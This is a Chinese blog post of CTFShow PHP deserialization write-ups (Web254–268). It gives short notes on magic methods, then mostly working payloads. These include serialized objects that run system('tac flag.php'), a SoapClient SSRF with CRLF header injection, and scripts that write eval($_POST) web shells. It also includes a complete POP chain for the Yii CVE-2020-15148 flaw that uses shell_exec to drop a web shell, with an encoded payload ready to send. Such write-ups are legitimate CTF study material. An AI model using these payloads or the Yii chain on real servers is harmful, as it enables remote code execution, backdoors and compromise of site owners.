<!DOCTYPE html><html lang="zh"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.8.0" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.8.0" type="image/png" sizes="32x32"><meta name="description" content="PHP反序列化总结       反序列化学的比较烂，所以这一篇基本上是CTFSHOW题解了。">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP反序列化总结">
<meta property="og:url" content="http://yan5ui.github.io/2023/07/08/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%80%BB%E7%BB%93/index.html">
<meta property="og:site_name" content="yansui&#39;s blogs">
<meta property="og:description" content="PHP反序列化总结       反序列化学的比较烂，所以这一篇基本上是CTFSHOW题解了。">
<meta property="og:locale">
<meta property="article:published_time" content="2023-07-08T13:29:01.223Z">
<meta property="article:modified_time" content="2023-07-08T13:34:59.000Z">
<meta property="article:author" content="yansui">
<meta name="twitter:card" content="summary"><title>PHP反序列化总结 | yansui's blogs</title><link ref="canonical" href="http://yan5ui.github.io/2023/07/08/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%80%BB%E7%BB%93/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.8.0"><link rel="stylesheet" href="css/custom.css"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"Copy","copySuccess":"Copy Success","copyError":"Copy Error"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 6.3.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">Home</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">yansui的小窝</div><div class="header-banner-info__subtitle">一个成长中的ctfer</div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">PHP反序列化总结</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Created</span><span class="post-meta-item__value">2023-07-08</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Updated</span><span class="post-meta-item__value">2023-07-08</span></span></div></header><div class="post-body">
        <h1 id="PHP反序列化总结"   >
          <a href="#PHP反序列化总结" class="heading-link"><i class="fas fa-link"></i></a><a href="#PHP反序列化总结" class="headerlink" title="PHP反序列化总结"></a>PHP反序列化总结</h1>
      <p>反序列化学的比较烂，所以这一篇基本上是CTFSHOW题解了。</p>
<span id="more"></span>

        <h2 id="一、PHP前置基础"   >
          <a href="#一、PHP前置基础" class="heading-link"><i class="fas fa-link"></i></a><a href="#一、PHP前置基础" class="headerlink" title="一、PHP前置基础"></a>一、PHP前置基础</h2>
      <p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.runoob.com/php/php-tutorial.html" >菜鸟就完了</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h2 id="二、PHP反序列化简介"   >
          <a href="#二、PHP反序列化简介" class="heading-link"><i class="fas fa-link"></i></a><a href="#二、PHP反序列化简介" class="headerlink" title="二、PHP反序列化简介"></a>二、PHP反序列化简介</h2>
      
        <h3 id="1-反序列化是什么？为什么存在漏洞？"   >
          <a href="#1-反序列化是什么？为什么存在漏洞？" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-反序列化是什么？为什么存在漏洞？" class="headerlink" title="1.反序列化是什么？为什么存在漏洞？"></a>1.反序列化是什么？为什么存在漏洞？</h3>
      <p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44576725/article/details/124050658" >懒得写了，放个链接</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h3 id="2-关于魔术方法"   >
          <a href="#2-关于魔术方法" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-关于魔术方法" class="headerlink" title="2.关于魔术方法"></a>2.关于魔术方法</h3>
      <p>什么是魔术方法？</p>
<p>与反序列化相关的魔术方法：<br>构造方法__construct、析构方法__destruct在序列化和反序列化过程中都不会被调用<br>但是当某个对象被销毁时会调用析构方法，可以利用这一点构造POP链。</p>
<p>反序列化不调用构造方法</p>

        <h3 id="3-关于类中不同类型的属性"   >
          <a href="#3-关于类中不同类型的属性" class="heading-link"><i class="fas fa-link"></i></a><a href="#3-关于类中不同类型的属性" class="headerlink" title="3.关于类中不同类型的属性"></a>3.关于类中不同类型的属性</h3>
      <p>public:反序列化得到的变量名就是它自己</p>
<p>private:在变量名前添加标记\00(classname)\00，长度+2+类名长度: <code>s:17:&quot;\00FileHandler_Z\00op&quot;;i:2;</code></p>
<p>protected:在变量名前添加标记\00*\00，长度+3: <code>s:5:&quot;\00*\00op&quot;;i:2;</code></p>

        <h2 id="二、CTFShow题解"   >
          <a href="#二、CTFShow题解" class="heading-link"><i class="fas fa-link"></i></a><a href="#二、CTFShow题解" class="headerlink" title="二、CTFShow题解"></a>二、CTFShow题解</h2>
      
        <h3 id="Web254"   >
          <a href="#Web254" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web254" class="headerlink" title="Web254"></a>Web254</h3>
      <p>有点难绷，账号和密码就是xxxxxx</p>

        <h3 id="Web255"   >
          <a href="#Web255" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web255" class="headerlink" title="Web255"></a>Web255</h3>
      <p>payload:<br>GET &#x2F;?username&#x3D;xxxxxx&amp;password&#x3D;xxxxxx<br>COOKIE user&#x3D;O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D</p>
<p>一定记得URL编码，否则会出现奇怪的问题</p>

        <h3 id="Web256"   >
          <a href="#Web256" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web256" class="headerlink" title="Web256"></a>Web256</h3>
      <p>看起来跟上面一题一样，不确定，payload打一下试试<br>原来是加了username和password不能一样的限制，改一下就行</p>
<p>payload:<br>GET &#x2F;?username&#x3D;123&amp;password&#x3D;456<br>COOKIE user&#x3D;O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A3%3A%22123%22%3Bs%3A8%3A%22password%22%3Bs%3A3%3A%22456%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D</p>

        <h3 id="Web257"   >
          <a href="#Web257" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web257" class="headerlink" title="Web257"></a>Web257</h3>
      <p>GET &#x2F;username&#x3D;1&amp;password&#x3D;2<br>payload:<br>O:11:”ctfShowUser”:4:{s:21:”ctfShowUserusername”;s:1:”1”;s:21:”ctfShowUserpassword”;s:1:”2”;s:18:”ctfShowUserisVip”;b:0;s:18:”ctfShowUserclass”;O:8:”backDoor”:1:{s:14:”backDoorcode”;s:13:”system(‘tac flag.php’);”;}}</p>
<p>user&#x3D;O%3A11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A21%3A%22%00ctfShowUser%00username%22%3Bs%3A1%3A%221%22%3Bs%3A21%3A%22%00ctfShowUser%00password%22%3Bs%3A1%3A%222%22%3Bs%3A18%3A%22%00ctfShowUser%00isVip%22%3Bb%3A0%3Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A23%3A%22system(‘tac%20flag.php’)%3B%22%3B%7D%7D</p>

        <h3 id="Web258"   >
          <a href="#Web258" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web258" class="headerlink" title="Web258"></a>Web258</h3>
      <p>还有过滤？？什么鬼东西<br><code>preg_match(&#39;/[oc]:\d+:/i&#39;, $_COOKIE[&#39;user&#39;])</code>这是什么意思呢？</p>
<blockquote>
<p>这个PHP语句使用正则表达式来匹配一个名为’user’的cookie值。正则表达式模式是&#x2F;[oc]:\d+:&#x2F;i。<br>让我们逐个解释模式中的各个部分：<br>[oc]：这是一个字符类（character class），它匹配单个字符，可以是字母’o’或’c’中的任意一个。<br>:：匹配冒号字符。<br>\d+：这是一个量词，表示匹配一个或多个数字字符。<br>:：匹配冒号字符。<br>&#x2F;i：是一个修饰符（modifier），表示不区分大小写匹配。<br>因此，该正则表达式模式用于查找以字母’o’或’c’开头，后跟一个或多个数字字符，然后以冒号结尾的字符串。如果该模式匹配了用户的cookie值，条件就会满足。</p>
</blockquote>
<p>payload:<br>O:+11:”ctfShowUser”:4:{s:8:”username”;s:1:”1”;s:8:”password”;s:1:”2”;s:5:”isVip”;b:0;s:5:”class”;O:+8:”backDoor”:1:{s:4:”code”;s:22:”system(‘tac flag.php’)”;}}</p>
<p>上面那个system语句忘记加分号了 我是傻逼<br>O:+11:”ctfShowUser”:4:{s:8:”username”;s:1:”1”;s:8:”password”;s:1:”2”;s:5:”isVip”;b:0;s:5:”class”;O:+8:”backDoor”:1:{s:4:”code”;s:13:”system(‘ls’);”;}}</p>
<p>O:+11:”ctfShowUser”:4:{s:8:”username”;s:1:”1”;s:8:”password”;s:1:”2”;s:5:”isVip”;b:0;s:5:”class”;O:+8:”backDoor”:1:{s:4:”code”;s:23:”system(‘tac flag.php’);”;}}</p>
<p>有效的payload:<br>O:+11:”ctfShowUser”:1:{s:5:”class”;O:+8:”backDoor”:1:{s:4:”code”;s:17:”system(‘tac f*’);”;}}</p>

        <h3 id="Web259"   >
          <a href="#Web259" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web259" class="headerlink" title="Web259"></a>Web259</h3>
      <p>好像跟反序列化没啥关系啊</p>
<p>用原生类的反序列化打SSRF，上难度了</p>
<p>本题的思路简单来说就是利用PHP原生类中__call函数可控的部分来注入HTTP头，控制UA，使得服务器误以为UA的内容就是HTTP头中的其他内容，从而完成对XFF的覆盖（因为XFF在UA的后边）</p>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://blog.csdn.net/qq_45694932/article/details/120498828" >参考链接</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>payload:</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$ua</span>=<span class="string">&quot;ctfshow\r\nx-forwarded-for:127.0.0.1,127.0.0.1,127.0.0.1\r\nContent-Type:application/x-www-form-urlencoded\r\nContent-Length:13\r\n\r\ntoken=ctfshow&quot;</span>;</span><br><span class="line"><span class="variable">$client</span>=<span class="keyword">new</span> <span class="title class_">SoapClient</span>(<span class="literal">null</span>,<span class="keyword">array</span>(<span class="string">&#x27;uri&#x27;</span>=&gt;<span class="string">&quot;127.0.0.1/&quot;</span>,<span class="string">&#x27;location&#x27;</span>=&gt;<span class="string">&quot;http://127.0.0.1/flag.php&quot;</span>,<span class="string">&#x27;user_agent&#x27;</span>=&gt;<span class="variable">$ua</span>));</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$client</span>))</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></div></figure>

<p>这题对于我来说还是有点太难了</p>

        <h3 id="Web260"   >
          <a href="#Web260" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web260" class="headerlink" title="Web260"></a>Web260</h3>
      <p>直接传36D进去就行</p>

        <h3 id="Web261"   >
          <a href="#Web261" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web261" class="headerlink" title="Web261"></a>Web261</h3>
      <p>来玩玩CTFShow 感觉还是得结合buuctf</p>
<p>首先得熟悉一下出现的各种魔术方法：</p>
<p>__wakeup:当序列化字符串被反序列化时执行</p>
<p>__sleep:当序列化一个对象时执行</p>
<p>__invoke:尝试将对象调用为函数时执行</p>
<p>__construct:构造方法</p>
<p>__destruct:析构方法，一个对象被销毁时调用</p>
<p>__unserialize:这玩意第一次见，</p>
<blockquote>
<p>当__serialize和__sleep方法同时存在，序列化时忽略__sleep方法而执行__serialize；当__unserialize方法和__wakeup方法同时存在，反序列化时忽略__wakeup方法而执行__unserialize<br>__unserialize的参数：当__serialize方法存在时，参数为__serialize的返回数组；当__serialize方法不存在时，参数为实例对象的所有属性值组合而成的数组</p>
</blockquote>
<p>也就是说这里不会执行__wakeup了</p>
<p>学完了魔术方法就来审代码了</p>
<p>其实啥也不用管，只看析构方法就行,36D是弱类型比较。</p>
<p>EXP:</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class ctfshowvip&#123;</span><br><span class="line">    public $username = &#x27;877.php&#x27;;</span><br><span class="line">    public $password = &#x27;&lt;?php eval($_POST[1])?&gt;&#x27;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$a = new ctfshowvip();</span><br><span class="line">echo urlencode(serialize($a)).&quot;&lt;br&gt;&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></div></figure>

<p>下次试试直接system(‘tac &#x2F;*f*‘)</p>

        <h3 id="Web262"   >
          <a href="#Web262" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web262" class="headerlink" title="Web262"></a>Web262</h3>
      <p>是要让token为admin 什么鬼题目</p>
<p>EXP:</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">message</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$token</span>=<span class="string">&#x27;admin&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title function_ invoke__">message</span>();</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(<span class="title function_ invoke__">base64_encode</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>))).<span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br></pre></td></tr></table></div></figure>


        <h3 id="Web263"   >
          <a href="#Web263" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web263" class="headerlink" title="Web263"></a>Web263</h3>
      <p>一打开咋是个登录界面</p>
<p>实在太难了，当长长见识吧、</p>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1D64y1m78f?p=10&vd_source=66654db0160f9b7490e1f221926d79d2" >讲解视频</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>payload:</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">User</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$username</span>=<span class="string">&quot;1.php&quot;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$password</span>=<span class="string">&#x27;&lt;?php eval($_POST[a]);?&gt;//&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(<span class="title function_ invoke__">base64_encode</span>(<span class="title function_ invoke__">serialize</span>(<span class="string">&quot;|&quot;</span>.<span class="title function_ invoke__">serialize</span>(<span class="keyword">new</span> <span class="title class_">User</span>))));</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<blockquote>
<p>&#x2F;&#x2F;1.index.php<br>cookie传：&gt;limit&#x3D;czo5MjoifE86NDoiVXNlciI6Mjp7czo4OiJ1c2VybmFtZSI7czo1OiIxLnBocCI7czo4O&gt;iJwYXNzd29yZCI7czoyNjoiPD9waHAgZXZhbCgkX1BPU1RbYV0pOz8%2BLy8iO30iOw%3D%3D</p>
<p>&#x2F;&#x2F;2.带着cookie去访问check.php</p>
<p>&#x2F;&#x2F;3.访问log-1.php<br>post传：a&#x3D;system(‘cat flag.php’);</p>
<p>&#x2F;&#x2F;4.查看源代码获得flag</p>
</blockquote>

        <h3 id="Web264"   >
          <a href="#Web264" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web264" class="headerlink" title="Web264"></a>Web264</h3>
      <p>str_replace字符串逃逸</p>
<p>payload:</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?f=1&amp;m=1&amp;t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck&quot;;s:5:&quot;token&quot;;s:5:&quot;admin&quot;;&#125;</span><br></pre></td></tr></table></div></figure>


        <h3 id="Web265"   >
          <a href="#Web265" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web265" class="headerlink" title="Web265"></a>Web265</h3>
      <p>这题目怎么一个比一个难</p>
<p>exp(抄的):</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfshowAdmin</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$token</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$password</span>;</span><br><span class="line">   <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="variable language_">$this</span>-&gt;password=&amp;<span class="variable language_">$this</span>-&gt;token;</span><br><span class="line"> &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$a</span>=<span class="keyword">new</span> <span class="title function_ invoke__">ctfshowAdmin</span>();</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>);</span><br></pre></td></tr></table></div></figure>


        <h3 id="Web266"   >
          <a href="#Web266" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web266" class="headerlink" title="Web266"></a>Web266</h3>
      <p>有关try-catch-throw的参考：<br><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://deepinout.com/php-reference-manual/php-statement/php-try-catch-throw-statement.html" >参考文档</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>这里反序列化操作一定会执行，所以直接正常写exp就行</p>
<p>嘶 不对，不能正常执行完脚本 反序列化的对象不出作用域，执行不了析构函数，还是得注意一下</p>
<p>利用PHP对类名的大小写不敏感写exp<br>exp:</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Ctfshow</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$username</span>=<span class="string">&#x27;1&#x27;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$password</span>=<span class="string">&#x27;1&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title class_">Ctfshow</span>();</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>).<span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>);</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>上面的exp有错哦：</p>
<blockquote>
<p>在PHP中，服务器会自动进行URL解码的部分有：<br>GET传递的参数：GET请求中的参数会被服务器自动解码。这些参数通常出现在URL的查询字符串中，例如：example.com&#x2F;page.php?param1&#x3D;value1&amp;param2&#x3D;value2。服务器会将参数值自动解码为可读的形式，例如将%20解码为空格。<br>POST传递的参数：POST请求中的参数也会被服务器自动解码。这些参数通常包含在请求的正文中，不会显示在URL中。服务器会自动解码这些参数值，以便在PHP代码中使用。<br>以下部分不会被服务器自动进行URL解码：<br>User-Agent等HTTP头：HTTP头部包含了关于请求的附加信息，例如User-Agent、Content-Type等。这些头部信息不会被服务器自动解码，它们的值将保持原样，需要开发者自行解码。<br>通过php:&#x2F;&#x2F;input传递的内容：php:&#x2F;&#x2F;input是PHP中一个用于访问请求正文的流。如果你在代码中使用php:&#x2F;&#x2F;input来获取请求正文的内容，服务器不会自动进行URL解码。你需要自行解码来处理请求正文的内容。<br>需要注意的是，GET和POST请求中的参数在被服务器解码后，会被存储在超全局变量$_GET和$_POST中，这些变量中的值已经是解码后的形式，可以直接在PHP代码中使用，无需再进行解码。</p>
</blockquote>
<p>不编码就行了</p>

        <h3 id="Web267"   >
          <a href="#Web267" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web267" class="headerlink" title="Web267"></a>Web267</h3>
      <p>Yii框架反序列化漏洞，可以导致RCE:</p>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://blog.csdn.net/unexpectedthing/article/details/123829375" >CVE-2020-15148</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>可以抄到现成的POP链子：</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">yii</span>\<span class="title class_">rest</span>&#123;</span><br><span class="line">    <span class="title class_">class</span> <span class="title class_">CreateAction</span>&#123;</span><br><span class="line">        <span class="title class_">public</span> $<span class="title class_">checkAccess</span>;</span><br><span class="line">        <span class="keyword">public</span> <span class="variable">$id</span>;</span><br><span class="line"> </span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;checkAccess = <span class="string">&#x27;shell_exec&#x27;</span>;      <span class="comment">//php函数</span></span><br><span class="line">            <span class="variable language_">$this</span>-&gt;id =<span class="string">&quot;echo &#x27;&lt;?php eval(\$_GET[1]);phpinfo();?&gt;&#x27; &gt; /var/www/html/basic/web/2.php&quot;</span>;                      <span class="comment">//php函数的参数  </span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">Faker</span>&#123;</span><br><span class="line">    <span class="title class_">use</span> <span class="title class_">yii</span>\<span class="title class_">rest</span>\<span class="title class_">CreateAction</span>;</span><br><span class="line"> </span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Generator</span></span>&#123;</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$formatters</span>;</span><br><span class="line"> </span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;formatters[<span class="string">&#x27;close&#x27;</span>] = [<span class="keyword">new</span> <span class="title class_">CreateAction</span>(), <span class="string">&#x27;run&#x27;</span>];</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">yii</span>\<span class="title class_">db</span>&#123;</span><br><span class="line">    <span class="title class_">use</span> <span class="title class_">Faker</span>\<span class="title class_">Generator</span>;</span><br><span class="line"> </span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">BatchQueryResult</span></span>&#123;</span><br><span class="line">        <span class="keyword">private</span> <span class="variable">$_dataReader</span>;</span><br><span class="line"> </span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;_dataReader = <span class="keyword">new</span> <span class="built_in">Generator</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span>&#123;</span><br><span class="line">    <span class="title class_">echo</span> <span class="title class_">base64_encode</span>(<span class="title class_">serialize</span>(<span class="title class_">new</span> <span class="title class_">yii</span>\<span class="title class_">db</span>\<span class="title class_">BatchQueryResult</span>));</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></div></figure>

<p>payload:</p>
<blockquote>
<p>?r&#x3D;&#x2F;backdoor&#x2F;shell&amp;code&#x3D;TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6MTA6InNoZWxsX2V4ZWMiO3M6MjoiaWQiO3M6NzI6ImVjaG8gJzw&#x2F;cGhwIGV2YWwoJF9HRVRbMV0pO3BocGluZm8oKTs&#x2F;PicgPiAvdmFyL3d3dy9odG1sL2Jhc2ljL3dlYi8yLnBocCI7fWk6MTtzOjM6InJ1biI7fX19fQ&#x3D;&#x3D;</p>
</blockquote>

        <h3 id="Web268"   >
          <a href="#Web268" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web268" class="headerlink" title="Web268"></a>Web268</h3>
      <p>据说是换了条链子</p>
